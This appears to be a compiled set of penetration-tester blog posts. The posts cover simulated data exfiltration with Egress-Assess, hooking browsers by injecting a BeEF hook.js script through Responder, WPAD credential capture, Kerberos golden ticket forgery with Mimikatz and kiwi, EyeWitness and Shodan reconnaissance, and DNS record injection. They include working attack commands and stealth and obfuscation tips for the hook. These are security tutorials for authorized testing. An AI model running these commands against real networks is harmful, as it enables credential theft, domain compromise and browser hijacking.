Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over HTTP or DNS)
  • Download data through a Meterpreter session
  • Manually move data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service for a customer who wants to validate whether their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy-to-use solution that would simulate the extraction of sensitive data from my machine to another. While planning out the tool, I targeted a few protocols commonly used by attackers: FTP, HTTP, and HTTPS. To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two sensitive data types likely to have detection signatures across organizations are social security numbers and credit card numbers, so I decided to target those forms of data in my proof of concept.
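Egress-Assess ships its own dummy-data generators; as a rough illustration of the idea (this is my own sketch, not the tool’s code, and the function names are made up), SSN-formatted strings and Luhn-valid card numbers can be faked in a few lines of Python:

```python
import random

def fake_ssn():
    """Generate a random string in SSN format (AAA-GG-SSSS)."""
    return "%03d-%02d-%04d" % (random.randint(1, 899),
                               random.randint(1, 99),
                               random.randint(1, 9999))

def luhn_check_digit(partial):
    """Compute the Luhn check digit for a partial card number."""
    digits = [int(d) for d in partial][::-1]
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 0:  # these positions are doubled in the full number
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10

def fake_cc():
    """Generate a random 16-digit, Luhn-valid, Visa-style card number."""
    partial = "4" + "".join(str(random.randint(0, 9)) for _ in range(14))
    return partial + str(luhn_check_digit(partial))
```

Making the fake card numbers pass a Luhn check matters, because most DLP signatures validate the checksum before alerting on a 16-digit string.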

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate. It supports exfiltration testing over HTTP, HTTPS, and FTP. I envision the tool being used on an internal client and an external server, where data would be passed over network boundaries. Once the repository is cloned on both machines, the dummy data can be transferred from one to the other.

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp option and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running. With this going, all we need to do now is configure the client to connect to the server! This is simple, and can be done by telling Egress-Assess to act in client mode using ftp, providing the username and password to use, the IP to connect to, and the datatype to transmit (in this case, social security numbers). Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

ftpclientupdated

Within the same directory as Egress-Assess, a “data” directory will be created; all transmitted files are stored within it. At this point, the transfer is complete via FTP!
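For reference, the client side of a transfer like this is little more than a standard FTP upload; a minimal sketch using Python’s stdlib ftplib (the host, credentials, and filename below are placeholders, and this is not Egress-Assess’s actual implementation):

```python
import os
from ftplib import FTP

def exfil_over_ftp(host, username, password, local_path):
    """Upload a local file to the listening FTP server with a binary STOR."""
    ftp = FTP(host)
    ftp.login(user=username, passwd=password)
    with open(local_path, "rb") as fh:
        ftp.storbinary("STOR " + os.path.basename(local_path), fh)
    ftp.quit()

# Example (assumes the Egress-Assess FTP server from above is listening):
# exfil_over_ftp("192.168.63.149", "testuser", "pass123", "ssn_data.txt")
```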

You can also do the same over HTTP or HTTPS. Again, the first step will be starting one instance to act as the server, this time in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers). This amount can be changed using the “--data-size” flag. If we want to send approximately 15 megabytes of credit card data to our web server over HTTP, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!
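The HTTP transfer is conceptually just a POST of the generated data to the listening server; a minimal stdlib sketch of the client side (the URL and payload are placeholders, not Egress-Assess’s actual code):

```python
import urllib.request

def exfil_over_http(server_ip, data, port=80):
    """POST a blob of dummy data to the listening web server."""
    url = "http://%s:%d/" % (server_ip, port)
    req = urllib.request.Request(
        url, data=data,
        headers={"Content-Type": "application/octet-stream"})
    return urllib.request.urlopen(req)

# Example (assumes ./Egress-Assess.py --server http is running on the far side):
# exfil_over_http("192.168.63.149", b"123-45-6789\n" * 1000)
```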

That about rounds out the current state of Egress-Assess. Future revisions will focus on modularizing the tool so users can easily add support for new protocols and new data types for transfer. If there are any other requests, I’d love to hear them!

Getting Hooked up with Responder and Beef

Responder is a really effective tool that I’ve written about before which can be used to easily obtain user credentials on a network. In Responder’s 2.0 release, however, the ability to perform HTML injection attacks was added to the tool. This capability can be easily utilized to perform a variety of nefarious actions against our targets. The first tool that I thought of using to leverage Responder’s HTML injection capability is BeEF, a browser exploitation framework. The goal of an attacker utilizing BeEF is to “hook” another user’s browser. Once hooked, BeEF contains a large number of modules that can be used to attack the victim’s web browser (I would do it a disservice if I tried to describe all of BeEF’s capabilities in a single post). So the attack I’m going to demonstrate uses Responder’s ability to inject HTML to hook systems on the network I am targeting with BeEF.

Edit: @Antisnatchor provided some really good feedback in the comments. I think it’s worth everyone reading what he said, so his comments are copied here:

“Few things to add, change the following in the main config.yaml config file:

– reduce xhr_poll_timeout to 500 (milliseconds), so polling will happen twice a second
– change hook_file to jquery.js or something different to change the hook name (more stealthy), as well as hook_session_name and session_cookie_name to different values.
– enable the Evasion extension, just use ‘scramble’ + ‘minify’ as obfuscation techniques. This will minify/pack JS and scramble variables like BeEF/beef to random ones.
– change default BeEF credentials and web_ui_basepath

I would also add the BeEF hook tag in rather than .

Then once it’s up, you can automate module launching to multiple hooked browsers based on fingerprinting results via the RESTful API.”

First, you’re going to need to get BeEF started on your attacking platform. If you’re using Kali, it’s located within the /usr/share/beef-xss directory. Once within it, simply type “./beef” and wait as the framework starts up. Your console should look similar to the following once it is ready to go:

Beef startup

Next up, we need to slightly modify Responder’s config file.  If you haven’t already, clone the project to your attacking platform, and then open up Responder.conf in a text editor.  Within the Responder.conf file you’re going to want to change the “HTMLToServe” value.  To carry out the attack, we want to inject Beef’s javascript file used to hook browsers.  I just changed the value to be:

HTMLToServe = <html><head></head><body><script src="http://192.168.63.149:3000/hook.js" type="text/javascript"></script></body></html>

Your config should look similar to the following now:

Responder Config

With this added in, Responder will inject the JavaScript containing our BeEF hook into any page that it can. First, I’m going to need to start Responder. The options I am passing into Responder tell it to listen on my local IP, stand up a rogue WPAD proxy, and display verbose messages.

Start Responder

With both BeEF and Responder up and running, it’s time to get our hooks! To test this out, I’m going to have the web browser on my Windows 7 victim VM attempt to navigate to http://intranet/. In my case, I don’t have an actual machine called “intranet” within my lab network, so when the browser requests the page, Responder will serve up a web page containing only the BeEF hook code.

Web-Requested

Not only did Responder see the web request, but it was also able to obtain the NTLMv2 hash used by the current user “sonofflynn”. If I were to look at the web page on my Windows 7 VM, it just shows a blank page. However, the blank page has also loaded my BeEF hook, and after logging into the BeEF console, I can see the browser has successfully been hooked. With our victim’s browser hooked, we can now perform a wide variety of enumeration and attacks against, or through, the victim’s browser. I highly recommend reviewing the large number of posts that cover BeEF and the variety of attacks it contains.

Beef Hooked

At times, I have had Responder act “funny” by serving up what appears to be random ASCII vs. an actual website, and I have also had occasional issues with it injecting the HTML code. However, the process above works best for me to get repeatable results and hooks. If there’s something that I’ve missed, or a better way to inject HTML code/BeEF hooks/etc., I’d love to hear about it and learn a better way (or maybe the right way :)). Otherwise, hope that this helps, and feel free to hit me up with any questions!

Responder & User Account Credentials – First Come, First Served

Responder is an awesome tool that was created by Laurent Gaffie and can be extremely effective to use on pen tests.  I recently had the opportunity to use Responder, and it returned valid domain credentials within about 10 minutes.  I wanted to write this post as an opportunity to document what worked for myself.  With that said, Larry Spohn also wrote an excellent blog post on essentially the same attack which can be viewed here, so be sure to go and check that post out as well!

Responder can return results two different ways. We can try to receive the NTLM challenge hash(es) from workstations, or Responder can return credentials via basic authentication. Ideally, the easiest for an attacker to work with is basic authentication, since the data is only base64 encoded and therefore trivially reversible.

The specific vulnerability being attacked here is that, by default, workstations are configured to automatically detect proxy settings for the network they are operating on. When a workstation attempts to find the proxy settings it needs, it does so by first requesting “WPAD” over DHCP. If the workstation doesn’t receive a response, it will then make multiple DNS requests. If DNS also doesn’t return any results, the workstation will finally fall back to requesting over NetBIOS (source). If configured to do so, Responder can act as a rogue WPAD proxy. Responder can then serve a PAC file (configured as you see fit) and attempt to proxy all connections through itself.

One trick Responder can perform (if configured to do so) is responding to HTTP requests from workstations that are attempting to access local resources (such as http://intranetsite). The nifty aspect of this trick is that, to the user, the pop-up appears as a normal-looking authentication box prompting them to enter their credentials. Once entered, the credentials are transferred to the attacker, base64 decoded, and displayed. So, that’s the background to this attack; let’s check it out.
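The “base64 decoded” step is worth seeing concretely; decoding a captured Basic Authorization header takes one standard-library call (a quick illustration of why basic auth is so attractive to an attacker, not Responder’s actual code):

```python
import base64

def decode_basic_auth(header_value):
    """Decode an 'Authorization: Basic ...' header value into (user, password)."""
    encoded = header_value.split(" ", 1)[1]  # drop the "Basic " prefix
    user, _, password = base64.b64decode(encoded).decode().partition(":")
    return user, password

# A header carrying testuser/badpassword round-trips like so:
header = "Basic " + base64.b64encode(b"testuser:badpassword").decode()
print(decode_basic_auth(header))  # → ('testuser', 'badpassword')
```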

First, we’re going to need to configure how Responder is going to operate on the network.  We’re going to need to pass it a couple command line options:

  • -i <IP Address or network interface> – The IP address to listen on
  • --wpad – Tells Responder to start a “rogue” WPAD proxy server
  • -b – Tells Responder to return basic authentication information vs. NTLM
  • -F – Tells Responder to force NTLM or basic authentication from any machine attempting to access the WPAD file
  • -f – Tells Responder to fingerprint the host

Starting Responder

As you can see, Responder is pretty simple to setup and get up and running.  Once the previous command has been run, you should see something similar to the following:

Responder Started

This is roughly what Responder is going to look like once it is up and running.  For now, you can sit and wait for information to start coming in.  A good time to utilize Responder is when you’re first getting started on an assessment.  Responder can be one of the first tools you get running, and you can just leave it be and check back in on the results later.

Once Responder has been running for a while, check whether any juicy information has been returned to us! Below is what your output will likely look like:

Responder Output

What’s awesome to see here is the “HTTP-User & Password:” line! We can see the username “testuser” and password “badpassword” were returned to us, so now we have our first set of user credentials! From a user’s perspective, this is what the popup looked like on a Windows 8.1 desktop:

WPAD Desktop

This is a fairly typical screen and users are *LIKELY* going to enter their account information without a second thought.

At any point, you can stop running Responder, and it will have logged all credential information into a file for viewing.  In my case, this is what I have on my attacker platform:

Responder Loot File

If the same user were to keep entering their username and password, there would be duplicate (or more) entries of the credentials within the loot file.

Responder is an extremely powerful tool that can be used to quickly grab credentials when plugged into a network segment that users are also operating on.  I highly recommend using it as it can be a great way to get an initial foothold into your target network.

Mimikatz, Kiwi, and Golden Ticket Generation

First off, I want to state that the purpose of writing this post is to help myself learn how to use Golden Tickets on assessments.  If you want to see some great write-ups about Golden ticket generation, be sure to look at these:

Those posts are significantly more authoritative on the subject than mine, I just wanted to write this out so I can reference this on assessments.

Golden tickets can offer an extremely powerful way for an attacker to escalate privileges on a network, or to obtain access to resources which are only available to a select group. However, it’s absolutely worth mentioning that with this great power, pen testers need to take extra precautions to protect any golden tickets they’ve created. It’s highly recommended that any ticket created be securely encrypted during your assessment and securely deleted when it is no longer needed.

Golden tickets can be generated two different ways. The first is through the kiwi extension in Metasploit, and the other is through the standalone Mimikatz application. This post will show how to use both options to generate your ticket. Let’s start off with Metasploit’s kiwi extension.

At this point, I am going to assume that you have a meterpreter session, as SYSTEM, on the domain controller for the domain you are targeting.  Within your session, you want to load the kiwi extension by typing:

load kiwi

Load Kiwi

Now that the kiwi extension is loaded, typing help should show the additional commands available to you. The command that we’re interested in is golden_ticket_create. In order to create the golden ticket, we’re going to need at least four pieces of information (tickets can be further customized with additional information, but the generation process needs a minimum of four):

  • The Domain Name
  • The Domain SID
  • The krbtgt account’s NT hash
  • The user account you want to create the ticket for

MSF Golden Ticket Create

To get this information, you can just interact with the meterpreter session you already have active.  Drop into a shell, and run:

whoami /user

Domain Sid

The domain SID starts at the S-1… and goes to …70370.  Copy and paste that information into a text file.  Next up, grab the domain name.  One way I like to do this is just running:

ipconfig /all

Find Domain Name

In this case, I can see (and I know) the domain name is PwnNOwn.com. So, this info should also be saved off to a text file. The last big hurdle is the NT hash of the krbtgt account. Since you should be on the DC, perform a hashdump and obtain the krbtgt hash.
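Incidentally, you don’t need to trim the SID by eye: the domain SID is just the user’s SID from whoami /user with the final RID component stripped off. A quick sketch of that parsing (the trailing RID 1103 below is a made-up example):

```python
def domain_sid(user_sid):
    """Strip the trailing RID from a user SID to get the domain SID."""
    return user_sid.rsplit("-", 1)[0]

# e.g. a user SID as printed by `whoami /user` (RID 1103 is hypothetical):
print(domain_sid("S-1-5-21-522332750-710551914-1837870370-1103"))
# → S-1-5-21-522332750-710551914-1837870370
```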

Now that we have all of the required information, we can generate a golden ticket! At this point, determine the user account you want to impersonate; you can actually even use a nonexistent account. Now, it’s just a matter of getting everything in place for the command. In our case, the command looks like this:

golden_ticket_create -d PwnNOwn.com -k <nthash partially redacted> -s S-1-5-21-522332750-710551914-1837870370 -u invaliduser -t /root/Downloads/invaliduser.tck

MSF Ticket Created

We can see from the previous picture that the ticket was successfully created and written out.  The user that we are impersonating is “invaliduser”, and the ticket is saved to /root/Downloads/invaliduser.tck.

Now that the ticket has been created, it’s time to apply it to our current session.  To do this you want to type the following command:

kerberos_ticket_use /root/Downloads/invaliduser.tck

Ticket applied

In the above screenshot, I cleared all existing tickets, then applied the created ticket, and then we can see the golden ticket in use.  Note: you don’t have to purge existing tickets, but I did for demonstration purposes.

Now that the ticket has been applied, a low level user account can now act as a Domain Administrator:

MSF Ticket Applied

The user account could not previously access the DC’s C$ share, but with the ticket applied, it can!  We’re now operating with the same level of permissions as a DA!


So, our other option for generating and using golden tickets is the standalone Mimikatz binary. You can download it from here. Once downloaded, navigate to the Mimikatz binary and start it. We can re-use the information we already have to generate our golden ticket. To generate the ticket, you’re going to run a command similar to the following:

kerberos::golden /user:invaliduser2 /domain:PwnNOwn.com /sid:S-1-5-21-522332750-710551914-1837870370 /krbtgt:<ticket partially redacted> /ticket:invalidadmin.tck /groups:501,502,513,512,520,518,519

(Thanks to Benjamin Delpy (@gentilkiwi) for letting me know that I failed at redacting my own krbtgt hash, haha.  This is why you should always post things from a test/lab domain :).  Pic below is now updated)

TicketcreatedWin


In this case, we’re creating a ticket for a nonexistent user account, the User ID is at its default value (500), and we’ve added the groups that the user should be part of. The ticket is saved to the invalidadmin.tck file within the same directory that the Mimikatz binary is running from.

Now that the ticket has been created, we just want to apply it with Mimikatz.  This can be done by running the following command:

kerberos::ptt invalidadmin.tck

Win Ticket Submission

And to verify that we have administrative access to the domain controller again…

Access DC Share

We can actually also see from the DC that the Logon was successful, even though it was with an account that doesn’t exist within the domain!

Windows Log

And that’s about it!  Writing this out helped me gain a better understanding about generating and using golden tickets, hope that it can help someone else too!

EyeWitness Now in Ruby!

The best way for me to learn a language is to give myself a task and force myself to write a script/program that carries it out. In this case, I’ve been wanting to change some aspects of EyeWitness, and decided that porting EyeWitness to Ruby would be a great way to make those changes and learn a new language. After @harmj0y suggested that I look into learning Ruby, I decided to dive in and get it done. Now, after about two months of working on it, I’m happy to say the EyeWitness Ruby port is ready for its initial release.

To view and download EyeWitness, head to my Github account, or click here!

I will continue to keep the Python version of EyeWitness available, as there are a few differences between the two versions of EyeWitness.  These differences are:

  • Screenshot Library – By adding an additional library for capturing screenshots, the user can switch between the two in the event that one library encounters an issue when capturing select websites.
    • The Python version of EyeWitness uses Ghost to take screenshots of websites. One of the benefits of this is that it can run headlessly. However, I have seen an issue where, when given 3000+ websites, Ghost can freeze. Also, Robin Wood (@digininja) pointed out that EyeWitness can completely crash while screenshotting websites. This looks to be due to a potential file descriptor leak within Ghost. Even though I rarely hit these issues, I still wanted an alternative, and that alternative has been implemented in the Ruby version.
    • The Ruby version uses Selenium for capturing screenshots. Specifically, selenium-webdriver will start up an instance of your web browser (Firefox by default) and use it to navigate to and screenshot web pages. For this first release, the Ruby version ONLY supports Firefox (or a fork like Iceweasel). Future releases will support other browsers, such as Chrome.
  • User Agent Switching
    • The Ruby version of EyeWitness does not currently have the ability to dynamically switch user agents for every URL and perform the same comparison checks that the Python version can carry out. This is because EyeWitness would have to instantiate a new selenium-webdriver object for every user agent, which takes the form of a new web browser opening up. I believe it would be more of a hassle/distraction to have a large number of web browsers open, so I have not implemented it in the Ruby version. If this is needed, you can still use the user agent switching functionality within the Python version.
  • File Input
    • The Ruby version of EyeWitness requires you to specify the file type you are using as input. If using Nmap XML output for EyeWitness, you will have to use the --nmap flag; for Nessus, the --nessus flag.
  • Skip Sorting
    • The Ruby version has a --skip-sort flag. This tells EyeWitness not to group similar pages together, and to write out the report as it goes, vs. writing the report at the end after sorting all pages.

These seem to be the major differences within the two versions for the time being.  I personally believe the Ruby implementation of EyeWitness will be better to use for assessments.  If you encounter any issues, please be sure to report them to me!

Thanks!

EyeWitness Usage Guide

NOTE: This post is now out of date – check this for the latest info – https://www.christophertruncer.com/eyewitness-2-0-release-and-user-guide/

I originally released EyeWitness in February in what I thought was a pretty functional state. When released, EyeWitness came in at about 400 lines of code. Since February, it has had multiple new features added (which I will go over in this post), and its code base has expanded to about 1,600 lines of code. I’d like this post to act as a usage guide covering all the normal usage scenarios I can think of.

I’ll start off by describing how I normally use EyeWitness. I typically call EyeWitness, provide it a text file (with each URL on a new line), and let it run. If I have a .nessus file or Nmap XML output with more than 350 URLs, I’ll run EyeWitness with the --createtargets flag (explained below) and output all the targets to a single text file. I typically then split that file up into roughly 300 URLs per text file, and then either script up EyeWitness to run one scan after another, or run scans simultaneously. However, different situations might call for EyeWitness to be used in a different manner, so hopefully this usage guide can explain all of its features.
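The splitting step is easy to script; a minimal sketch that chunks a URL list into files of roughly 300 entries each (the output filenames are my own convention, not part of EyeWitness):

```python
def split_url_file(urls, chunk_size=300):
    """Split a list of URLs into chunks of at most chunk_size entries."""
    return [urls[i:i + chunk_size] for i in range(0, len(urls), chunk_size)]

def write_chunks(path, chunk_size=300):
    """Read a URL file and write it back out as targets_NN.txt chunks."""
    with open(path) as fh:
        urls = [line.strip() for line in fh if line.strip()]
    for n, chunk in enumerate(split_url_file(urls, chunk_size), 1):
        with open("targets_%02d.txt" % n, "w") as out:
            out.write("\n".join(chunk) + "\n")
```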

Python:

The bare-bones, and likely most common, use of EyeWitness is to provide a single URL, or multiple URLs within a file, for EyeWitness to screenshot and generate a report. To provide a single URL, just use the --single flag as follows:

Single URL Scan

EyeWitness also accepts files for providing the URLs.  The file can be provided in the following formats:

  • Single text file with a URL on each line
  • Nmap XML output
  • .Nessus file
  • amap file output

To perform a scan using any of these file types, just provide the -f flag as follows:
File Input Scan

By default, EyeWitness will attempt to screenshot each website with a max timeout of 7 seconds. If it takes longer than 7 seconds to render a website, EyeWitness will skip to the next URL. If you wish to change the timeout, use the -t flag and set it to the max number of seconds you want EyeWitness to wait for a website to render.

Set Timeout

Once EyeWitness has finished navigating to all URLs and has generated a report, it outputs the report to the same directory EyeWitness is in, named based off of the date and time the scan ran. If you want to change the directory that EyeWitness outputs its report to, use the -d flag and provide a name. When using the -d flag, you can provide just a name, and EyeWitness will create the report using that name within the same directory as EyeWitness. You can also provide the full path to a directory, and EyeWitness will create the report folder at that location (just make sure you have the proper write permissions).

Directory name change Full Path report

Sorted reporting was a feature brought up to me by Jason Frank (@jasonjfrank) as something that would be helpful when reviewing the EyeWitness report.  If we had a way to make EyeWitness analyze the different web applications, and group similar web apps together, then it would be easy to quickly sort through/review the groups you want to target.  We envisioned similar printers, mirrored web pages, etc. all grouped together within the report.  Lucky for us, Rohan Vazarkar (@cptjesus) worked on adding this feature in.  His pull request was merged in on April 22nd, and EyeWitness will now attempt to sort all results based off of their title within each report generated.

The --localscan option was added based on a request from David McGuire (@davidpmcguire). We wanted a way to perform some basic port scanning for web servers once a machine has been compromised. Currently, one way to do it is to drop Nmap on the compromised machine, but we’d then have to install WinPcap on the machine, which requires admin rights. Instead, you can drop the Windows EyeWitness binary and provide the --localscan option with a CIDR range to scan. EyeWitness will then try to find any IP listening on ports 80, 443, 8080, and 8443 within the provided range. All live hosts listening on any of those ports will be added to a file that can be fed back into EyeWitness.

Localscan Portscanning
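Functionally, --localscan amounts to a TCP connect sweep of those four ports across the range; a rough stdlib approximation of the idea (my own sketch, not EyeWitness’s actual code):

```python
import ipaddress
import socket

WEB_PORTS = (80, 443, 8080, 8443)

def candidate_targets(cidr, ports=WEB_PORTS):
    """Expand a CIDR range into (ip, port) pairs to probe."""
    return [(str(ip), port)
            for ip in ipaddress.ip_network(cidr).hosts()
            for port in ports]

def is_listening(ip, port, timeout=1.0):
    """Return True if a TCP connect to ip:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((ip, port)) == 0

# live = [t for t in candidate_targets("192.168.63.0/24") if is_listening(*t)]
```

A plain connect() needs no raw sockets, which is exactly why this works without WinPcap or admin rights.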

The --createtargets option came about when I wanted EyeWitness to just provide me a list of all web servers from Nmap or Nessus XML output. All web servers that EyeWitness finds within Nmap’s XML output, or the .nessus file, will be added to a file containing the target servers. Just provide the filename you want your targets file to be called.

createtargets

The user agent definition and cycling came about from working with Micah Hoffman (@webbreacher), Robin Wood (@digininja), and Chris John Riley (@ChrisJohnRiley). After a lot of discussion on how best to carry out user agent switching and comparison, the feature was added in. First, you can simply provide the --useragent option, and EyeWitness will use any string you provide as the user agent.

Single User Agent

You can also use the --cycle option along with either browser, mobile, crawler, scanner, misc, or all. When using this option, EyeWitness makes a baseline request, then makes subsequent requests with user agents of the “type” you specified. If a subsequent request deviates “too much” from the baseline, it is added to the report, letting you know it differed from the baseline. The deviation is currently based on the length of the source code the web server returns to EyeWitness. By default, the deviation used to measure whether requests are different is set to 50. To change this value, use the --difference flag and provide the new value to use.

Uacycle Cycling Set Difference Value
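The deviation check itself is simple; conceptually it’s just a length comparison against the threshold (a sketch of the idea, not EyeWitness’s exact code):

```python
def differs_from_baseline(baseline_source, new_source, max_difference=50):
    """Flag a response whose page-source length deviates from the baseline
    by more than the allowed difference (the default threshold is 50)."""
    return abs(len(baseline_source) - len(new_source)) > max_difference

print(differs_from_baseline("a" * 1000, "a" * 1040))  # → False
print(differs_from_baseline("a" * 1000, "a" * 1100))  # → True
```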

Finally, the --jitter option was one discussed at a NovaHackers meeting and also requested by @ruddawg26. To use this option, provide all the scan parameters you would normally provide, but add the --jitter parameter at the end along with the base number of seconds to deviate from. EyeWitness will then randomize the order of the URLs provided (via text or XML) and add a random delay between each request.

Jitter command Jitter scan

EyeWitness also has a --open flag. If you provide it, each URL passed into EyeWitness will also be opened up in a web browser. Your command string might look similar to the following:

Open option

Ruby:

EyeWitnessRubyHelp

To generate a report for a single website, you need to use the -s or --single flag and provide the URL.

For file-based input, you will need to specify the file type that you are providing. If giving just a normal text file with a URL on each line, use the -f or --filename switch. If providing Nmap XML output, you’ll need to use the --nmap flag, and .nessus-based input requires the --nessus flag.

The --skip-sort flag tells EyeWitness not to auto-group similar web pages together in the report. This can be helpful if you want to see report pages as they become available, instead of waiting until the very end. However, if this flag is used, similar pages will not be grouped together.

The --no-dns flag is used when you want EyeWitness to find web servers via their IP addresses, not their DNS names, while parsing Nmap XML output.

This pretty much covers the features of EyeWitness.  If anyone has any questions, don’t hesitate to get in touch with me.  Also, please be sure to send any signatures you might have made!

ShodanSearch.py for Command Line Searches

By now, everyone should know what Shodan is and how to use it. It’s been out for a couple of years, has had multiple presentations given on it, and its capabilities have been added to at least a few reconnaissance tools. Shodan indexes a large amount of data, which is really helpful when searching for specific devices that happen to be connected to the internet.

In my case, I wanted to start adding signatures of different devices to EyeWitness, but I needed something that could quickly find the devices I wanted to write a signature for. Quite obviously, Shodan was my answer. Something else I wanted to do was stage multiple searches for different devices on Shodan. However, if I were to do this via the web interface, I would either have to perform one search after another, or manage a large number of tabs. I figured it would be easier to write a quick script that utilizes Shodan’s API (grab an API key here), as it would give me the flexibility to script up a large number of searches for review later on. This spawned a quick script to search Shodan, fittingly called ShodanSearch.

ShodanSearch

The simplest way to use this script is to call it with the -search option and provide a string to search for. This is just like searching for a string on the website. You could perform that search by typing something similar to the following:

./ShodanSearch.py -search Apache

And see something similar to this:

String Search

Another feature that can be useful is searching Shodan by IP. This will return everything Shodan has indexed about the services available on the provided IP. There are three different ways to do this within ShodanSearch: the -ip, -cidr, or -f options. The -ip option performs a Shodan search for a single IP address, the -cidr option performs a search for every IP within the provided CIDR network range, and the -f option takes a file containing IPs and searches for all results on those IP addresses. Your searches could look similar to the following:

IP Search
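One way the three options can collapse into a single code path is to first expand whatever the user supplied into a flat list of addresses, then look each one up.  This is only a sketch of that idea using the standard library’s ipaddress module; the function names are mine, not ShodanSearch’s:

```python
import ipaddress


def expand_targets(value):
    """Expand a single IP (-ip) or CIDR range (-cidr) into host addresses."""
    if "/" in value:
        network = ipaddress.ip_network(value, strict=False)
        return [str(host) for host in network.hosts()]
    return [value]


def targets_from_file(path):
    """Read one IP or CIDR entry per line from a file (-f), expanding each."""
    with open(path) as handle:
        lines = [line.strip() for line in handle if line.strip()]
    return [ip for line in lines for ip in expand_targets(line)]
```

Each resulting address can then be fed to Shodan’s host-lookup endpoint one at a time.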

These last few search options have been helpful on assessments when my team just wants a scripted way to see what’s been publicly indexed about our targets.  Most of the time it’s purely informational, but it has been valuable to our customers, so we provide it to them.

The only thing you’ll need to do to get up and running is add your Shodan API key to the script.  After that, you should be good to go!  Hope this helps, and feel free to get in touch with me for any questions you may have.

DNS Modification with DNSInject for Nessus Plugin 35372

Part of our normal pen test process when performing an external assessment is running a Nessus scan against the in-scope IP range(s) provided by our customer.  We usually have this running in the background while carrying out our own analysis of the same ranges.  On a past assessment, we started with this same process.  After some time had gone by, I checked the scan results we had so far and found an interesting vulnerability listed, specifically Nessus plugin 35372:

Nessus Plugin Info

Looking at the finding details, Nessus also provided the DNS zone that is vulnerable to modification.  However, I couldn’t find an existing tool that performed the record injection attack (see note below).  I had only seen a similar finding once, on an internal assessment, where I used dnsfun.  I wasn’t sure dnsfun would work in this case, and I wanted to learn how to write a script that performs the attack myself, so I decided to do just that.

I started off by reading RFC 2136 and learned that I would need to specify the zone I want to modify, specify the resource record to add or remove, and set the DNS packet’s opcode to 5 (UPDATE).  This is something that can easily be done with scapy.

Scapy Packet Definition

The great thing about scapy is that you can define any specific packet attribute values you wish (TTL, record type, etc.), and any attributes you don’t specify are automatically populated by scapy with sensible values.  The code above says: send a packet to a specific destination; it’s a UDP DNS packet with the opcode set to 5 (UPDATE); and the DNS-specific fields are filled in from the command line options provided by the user.  And… that’s it!
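For reference, here is what that packet looks like at the byte level.  This is not DNSInject’s code (which builds the packet with scapy); it’s a standard-library-only sketch of the same RFC 2136 UPDATE message, with the opcode set to 5 in the header, the target zone in the question section, and the new A record in the authority section.  The transaction ID is arbitrary:

```python
import socket
import struct


def encode_name(name):
    """DNS wire format: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode() for label in labels) + b"\x00"


def build_update(zone, record, ip, ttl=3600):
    """Build a raw RFC 2136 UPDATE message adding an A record to a zone."""
    header = struct.pack(">HHHHHH",
                         0x1337,    # transaction ID (arbitrary)
                         5 << 11,   # flags: opcode 5 (UPDATE), all other bits 0
                         1,         # ZOCOUNT: one zone
                         0,         # PRCOUNT: no prerequisites
                         1,         # UPCOUNT: one update record
                         0)         # ADCOUNT: no additional records
    zone_section = encode_name(zone) + struct.pack(">HH", 6, 1)   # type SOA, class IN
    update_section = (encode_name(record) +
                      struct.pack(">HHIH", 1, 1, ttl, 4) +        # type A, class IN, TTL, RDLENGTH
                      socket.inet_aton(ip))                        # RDATA: the new address
    return header + zone_section + update_section
```

The resulting bytes would then be sent over UDP port 53 to the vulnerable name server, which is exactly what scapy does for you once the layered packet is built.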

I wrapped this up into a script that lets you either add or delete A records on a vulnerable name server pretty easily.  It’s called, simply, DNSInject.

DNSInject Options

To add a record with DNSInject.py, just specify the add action, provide the vulnerable name server, the A record you wish to create, and the IP it will point to.  Your command should look similar to the following:

./DNSInject.py --add -ns 192.168.23.1 -d thisisa.test.local -ip 192.168.23.5

Injection

To delete a record, you only need to provide the vulnerable name server and the record to delete.  Again, your command could look similar to the following:

./DNSInject.py --delete -ns 192.168.23.1 -d thisisa.test.local

Deletion

To get and use DNSInject, just clone the following github repo – https://github.com/ChrisTruncer/PenTestScripts

Hope this helps, and if you have any questions, feel free to ask!

 

Note: Of course, after finishing this script, I discovered two other options that can carry out this attack, so I wanted to be sure to mention them.  Scapy has a built-in function to both add and delete records, and you could also use nsupdate.  Definitely be sure to check out those options as well!

EyeWitness – A Rapid Web Application Triage Tool

More than half of the assessments my team and I go on include web applications.  Even on network level assessments, as we identify live machines within a target network, it’s fairly common for us to find a large number of web applications.  These can be applications built for the customer’s own purposes, or web front ends for various appliances (switches, VOIP phones, etc.).  I needed a way to quickly get a look at every device serving up a web page, which would let me figure out which websites to prioritize.  Tim Tomes developed an awesome tool called PeepingTom which does exactly that.  It works great, and I recommend everyone check it out.

